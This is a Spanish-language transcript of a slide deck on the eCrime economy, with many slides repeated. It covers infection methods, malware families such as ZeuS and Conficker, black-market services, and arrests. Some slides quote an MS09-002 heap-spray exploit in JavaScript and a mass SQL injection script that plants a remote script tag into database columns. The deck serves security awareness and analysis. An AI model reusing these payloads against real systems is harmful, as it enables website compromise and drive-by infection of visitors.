eCrime y la industria del malware - Edge

Comentarios

Transcripción

eCrime y la industria del malware - Edge
eCrime y la industria del malware
Vicente Díaz
¿Qué es eCrime?
¿Qué es eCrime?
¿Qué es eCrime?
¿Qué es eCrime?
eCrime Inc.
Walmart
eCrime Inc
Microsoft
400.000
300.000
200.000
100.000
0
15a de la Fortune 500
País 58 de 197
PIB entre EAU y Nueva Zelanda (y esto antes de la crisis!)
No son un grupo de amigos ...
Fase 1: Infección
el último virus “bueno”
W32.Blaster.Worm (2003):
billy gates why do you make this possible ? Stop making
money and fix your software!!
el último virus “bueno”
W32.Blaster.Worm (2003):
billy gates why do you make this possible ? Stop making
money and fix your software!!
el último virus “bueno”
W32.Blaster.Worm (2003):
billy gates why do you make this possible ? Stop making
money and fix your software!!
el último virus “bueno”
W32.Blaster.Worm (2003):
billy gates why do you make this possible ? Stop making
money and fix your software!!
Si tuvieses TODOS los antivirus instalados ...
Detección alrededor del 30%
Varias muestras con detección de 5% para abajo...
¿por qué?
Troyanos, rootkits y malware
Pero... ¿cómo logran la infección los
troyanos?
Instalar -> Siguiente -> Acepto -> Siguiente -> Finalizar
Pero... ¿cómo logran la infección los
troyanos?
Instalar -> Siguiente -> Acepto -> Siguiente -> Finalizar
No todos los usuarios son “idiotas”
Ejemplos recientes
MS09-002: Parche 10 de Febrero
Exploit in-the-wild, 17 de Febrero
Cientos de dominios sirviendo el exploit
Principalmente, localizados en China
Ejemplo de patch-reversing
…
Ejemplos recientes
var
c=c0+c1+c2+c3+c4+c5+c6+c7+c8+c9+c10+c11+c12+c13+c14+c15+c16+c17+c18+c19+c20+c21+
c22+c23+c24+c25+c26+c27+c28+c29+c30+c31+c32+c33+c34+c35+c36+c37+c38+c39+c40+c41+c
42+c43+c44+c45+c46+c47+c48+c49+c50+c51+c52+c53+c54+c55+c56+c57+c58+c59+c60+c61+c6
2+c63+c64+c65+c66+c67+c68+c69+c70+c71+c72+c73+c74+c75+c76+c77+c78+c79+c80+c81+c82
+c83+c84+c85+c86+c87+c88+c89+c90+c91+c92+c93+c94+c95+c96+c97+c98+c99+c100+c101+c1
02+c103+c104+c105+c106+c107+c108+c109+c110+c111+c112+c113+c114+c115+c116+c117+c11
8+c119+c120+c121+c122+c123+c124+c125+c126+c127+c128+c129+c130+c131+c132+c133+c134
+c135+c136+c137+c138+c139+c140+c141+c142+c143+c144+c145+c146+c147+c148+c149+c150+
c151+c152+c153+c154+c155+c156+c157+c158+c159+c160+c161+c162+c163+c164+c165+c166+c1
67+c168+c169+c170+c171+c172+c173+c174+c175+c176+c177+c178+c179+c180+c181;
var array = new Array();
var ls = 0x100000-(c.length*2+0x01020);
var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xC0; i++) {
array[i] = lh + c;
}
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
MS09-002: Parche 10 de Febrero
Exploit in-the-wild, 17 de Febrero
Cientos de dominios sirviendo el exploit
Principalmente, localizados en China
Ejemplo de patch-reversing
function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null;
CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
</script>
Ejemplos recientes
Adobe Reader 0-day (PDF)
Descubiertos exploits a principios de Febrero, el
fabricante no era consciente de la
vulnerabilidad.
Se rumorea que puede estar circulando desde
Diciembre.
Parche oficial previsto para 11 de Marzo.
Disponible un parche “no oficial” desde finales
de Febrero.
Uhm, pero ¿como se distribuye?
Sitios maliciosos
Sitios legítimos (infecciones masivas)
Spam (en varios grados de peligrosidad)
Vulnerabilidades S.O. (p.e. Conficker)
Malvertising
Botnets de distribución
¿Botnet?
¿El spam es efectivo?
¿El spam es efectivo?
¿El spam es efectivo?
Infecciones masivas
Inyección SQL indiscriminada
Cientos de miles de afectados
Infecciones masivas
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND
(b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
Inyección SQL indiscriminada
OPEN Table_Cursor FETCH NEXT
FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC(
'UPDATE ['[email protected]+'] SET
['[email protected]+']=RTRIM(CONVERT(VARCHAR(4000),['[email protected]+']))+''<script src=http://
s1.cawjb.com/s.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
Cientos de miles de afectados
Infecciones masivas
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND
(b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
Inyección SQL indiscriminada
OPEN Table_Cursor FETCH NEXT
FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC(
'UPDATE ['[email protected]+'] SET
['[email protected]+']=RTRIM(CONVERT(VARCHAR(4000),['[email protected]+']))+''<script src=http://
s1.cawjb.com/s.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
Cientos de miles de afectados
Infecciones masivas
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND
(b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
Inyección SQL indiscriminada
OPEN Table_Cursor FETCH NEXT
FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC(
'UPDATE ['[email protected]+'] SET
['[email protected]+']=RTRIM(CONVERT(VARCHAR(4000),['[email protected]+']))+''<script src=http://
s1.cawjb.com/s.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
Cientos de miles de afectados
Malvertising
Varios vectores de ataque
Fase 2: Recolección
Pero... ¿por qué a mi?
Presentando: Paneles de control
Presentando: Paneles de control
Ejemplo de kit de malware
00FAA7CF5.php
Scanners result : 11/32 (34.38%)
HTML/MS06006.DF!exploit; Exploit-MS06-006.gen
99FFC5BA4.php
Scanners result : 6/32 (18.75%)
Trojan.DL.Script.JS.Agent.low; Exploit-OperaTN
CCF45A00D.php
Scanners result : 15/32 (46.88%)
HTML/MS06006.BB!exploit; Exploit:JS/ShellCode.A
EF57CCF90.php
Scanners result : 18/30 (60%)
JS/MS05-054!exploit; Exp/MS06071-A
FF5B341AC.php
Scanners result : 10/32 (31.25%)
Generic.XPL.ADODB.42D1EF40; Exploit-MS06-014
Ejemplo de kit de malware
00FAA7CF5.php
Scanners result : 11/32 (34.38%)
HTML/MS06006.DF!exploit; Exploit-MS06-006.gen
99FFC5BA4.php
Scanners result : 6/32 (18.75%)
Trojan.DL.Script.JS.Agent.low; Exploit-OperaTN
CCF45A00D.php
Scanners result : 15/32 (46.88%)
HTML/MS06006.BB!exploit; Exploit:JS/ShellCode.A
EF57CCF90.php
Scanners result : 18/30 (60%)
JS/MS05-054!exploit; Exp/MS06071-A
FF5B341AC.php
Scanners result : 10/32 (31.25%)
Generic.XPL.ADODB.42D1EF40; Exploit-MS06-014
Ejemplo de kit de malware
00FAA7CF5.php
Scanners result : 11/32 (34.38%)
HTML/MS06006.DF!exploit; Exploit-MS06-006.gen
99FFC5BA4.php
Scanners result : 6/32 (18.75%)
Trojan.DL.Script.JS.Agent.low; Exploit-OperaTN
CCF45A00D.php
Scanners result : 15/32 (46.88%)
HTML/MS06006.BB!exploit; Exploit:JS/ShellCode.A
EF57CCF90.php
Scanners result : 18/30 (60%)
JS/MS05-054!exploit; Exp/MS06071-A
FF5B341AC.php
Scanners result : 10/32 (31.25%)
Generic.XPL.ADODB.42D1EF40; Exploit-MS06-014
Principales familias
ZeuS
Sinowal
Infostealer
Conficker
Zeus
La historia de A-Z
Primeras distribuciones: SPAM
Múltiples variantes “no oficiales”
Ejecutable en /Run
Inyección HTML, redirección, captura
Zeus
La historia de A-Z
Primeras distribuciones: SPAM
Múltiples variantes “no oficiales”
Ejecutable en /Run
Inyección HTML, redirección, captura
Zeus
La historia de A-Z
Primeras distribuciones: SPAM
Múltiples variantes “no oficiales”
Ejecutable en /Run
Inyección HTML, redirección, captura
Zeus
La historia de A-Z
Primeras distribuciones: SPAM
Múltiples variantes “no oficiales”
Ejecutable en /Run
Inyección HTML, redirección, captura
Zeus
La historia de A-Z
Primeras distribuciones: SPAM
Múltiples variantes “no oficiales”
Ejecutable en /Run
Inyección HTML, redirección, captura
Sinowal
Desde el 2005: SPAM (adjunto) y vuln
IE
Evolución: Exe -> Dll (svchost) -> MBR
(pila TCP/IP propia)
Inyección dinámica, algoritmo
generación dominios
Estado actual
Sinowal
Desde el 2005: SPAM (adjunto) y vuln
IE
Evolución: Exe -> Dll (svchost) -> MBR
(pila TCP/IP propia)
Inyección dinámica, algoritmo
generación dominios
Estado actual
Sinowal
Desde el 2005: SPAM (adjunto) y vuln
IE
Evolución: Exe -> Dll (svchost) -> MBR
(pila TCP/IP propia)
Inyección dinámica, algoritmo
generación dominios
Estado actual
InfoStealer
Muy bajo nivel de detección
Capacidad de control remoto
Petición de coordenadas adicionales:
tras recolección, parece que empieza la
cosecha.
InfoStealer
Muy bajo nivel de detección
Capacidad de control remoto
Petición de coordenadas adicionales:
tras recolección, parece que empieza la
cosecha.
Conficker
Aprovecha la MS08-067 casi en paralelo
a la aparición del parche.
Más de 9 millones de PCs infectados.
Descarga falso Antivirus (de momento).
Propagación como Worm.
Conficker
Aprovecha la MS08-067 casi en paralelo
a la aparición del parche.
Más de 9 millones de PCs infectados.
Descarga falso Antivirus (de momento).
Propagación como Worm.
Conficker
Aprovecha la MS08-067 casi en paralelo
a la aparición del parche.
Más de 9 millones de PCs infectados.
Descarga falso Antivirus (de momento).
Propagación como Worm.
Conficker
Aprovecha la MS08-067 casi en paralelo
a la aparición del parche.
Más de 9 millones de PCs infectados.
Descarga falso Antivirus (de momento).
Propagación como Worm.
Más datos robados
Más datos robados
Fase 3: Mercado
Bienes y servicios
Originalmente: quién robaba los datos,
los explotaba.
Hoy en día el mercado es mucho más
rico.
Creadores
Venta de packs de malware
Robo/modificación de packs de malware
Creación de troyanos (también a
medida)
Evolución del mercado: algunos packs se
regalan, se vende el mantenimiento/
actualizaciones.
Competencia: ofertas, regalo servicios
adicionales.
Malware packs
Adrenalin 3000$
Firepack 300$ (3000$ cuando salío al
mercado)
76service: malware as a service web
interface. De 1000$ a 2000$.
NeoSploit: varía, pero son miles de USD.
Intermediación
Escrow
Calidad de servicio (SPAM)
Bullet proof ISPs
Anonimación tráfico
Explotación
Venta de datos “raw”
Venta de datos “limpios”: tarjetas,
historial bancario, credenciales
bancarias, juegos online
Alquiler botnets
Envío SPAM
Denegación de servicio
CCTrading (demo)
Más servicios
Rompe - captchas
Lavado de dinero
Pantallazos a texto
Más servicios
Rompe - captchas
Lavado de dinero
Pantallazos a texto
Presencia en el “mundo real”
Muleros
Transferencias fraudulentas
Carderz
Money laundering
Compra-venta ebay, egold, comprar tarjetas
regalo
Troyano que cifra el disco: pide rescate a
través de egold directamente
Servicio profesional ofrecido en el mercado
negro
Y, cómo no, las mulas
Money laundering
Compra-venta ebay, egold, comprar tarjetas
regalo
Troyano que cifra el disco: pide rescate a
través de egold directamente
Servicio profesional ofrecido en el mercado
negro
Y, cómo no, las mulas
Money laundering
Compra-venta ebay, egold, comprar tarjetas
regalo
Troyano que cifra el disco: pide rescate a
través de egold directamente
Servicio profesional ofrecido en el mercado
negro
Y, cómo no, las mulas
Money laundering
Compra-venta ebay, egold, comprar tarjetas
regalo
Troyano que cifra el disco: pide rescate a
través de egold directamente
Servicio profesional ofrecido en el mercado
negro
Y, cómo no, las mulas
Más servicios
Socks/proxy
Telefonistas soporte phishing (varios
idiomas)
Servicios de traducción
Man in the middle
Man in the browser (?)
Venta actualizaciones HTML Injection
Más servicios
Socks/proxy
Telefonistas soporte phishing (varios
idiomas)
Servicios de traducción
Man in the middle
Man in the browser (?)
Venta actualizaciones HTML Injection
Mercado
Competencia
Malware que limpia otro malware
Robo y modificación de packs
“hackeo” de paneles de control
Competencia
I've been using Zeus for over an
year now,
and
while Iotro
managed
to
Malware
que
limpia
malware
create a botnet of 100k infected
hosts
someone hijacked
from me
Robo
y modificación
de itpacks
by adding a new user and changing
“hackeo”
de paneles
de control
my default
layout to orange
just to
tip once he did it
Mercado totalmente maduro
Alquiler botnets ZeuS: tan barato que no
vale la pena comprar y distribuir el
troyano.
Phishing: el precio/hora de un phisher
es igual al precio marginal del mercado.
Fase 4: Respuesta
El panorama no es halagüeño
Pero no todo está perdido.
mccolo
mccolo
mccolo
estdomains
estdomains
estdomains
estdomains
The termination of ICANN-accredited
registrar EstDomains is to go ahead,
effective 24 November 2008.
On 28 October 2008, ICANN sent a
notice of termination to EstDomains,
Inc. (EstDomains) based on an
Estonian Court record reflecting the
conviction of EstDomains' then
president, Vladimir Tsastsin, of credit
card fraud, money laundering and
document forgery.
darkmarket
Más golpes
Sinowal: autores detenidos, intrusión de
RSA, red no activa desde hace meses
Detención de Iceman.
Condena a “mulas” en España.
Arrestos por ataques DDoS.
Quizá el mayor golpe es el aumento de la
concienciación colectiva, mayor difusión
de este tipo de noticias.
Tendencias de futuro
Rootkits evolucionados
Nuevas plataformas (MAC OsX)
Infecciones masivas
Más formatos afectados
Routers caseros
Secuestro de cuentas
Conclusiones
Negocio profesional.
Por desgracia, el fraude va un paso por delante.
Las medidas actuales NO son despreciables NI
suficientes.
Necesaria cooperación.
Y por supuesto, tener claro qué tipo de mundillo es
este ...
Conclusiones
Negocio profesional.
Por desgracia, el fraude va un paso por delante.
Las medidas actuales NO son despreciables NI
suficientes.
Necesaria cooperación.
Y por supuesto, tener claro qué tipo de mundillo es
este ...
Preguntas
Gracias
[email protected]
[email protected]

Documentos relacionados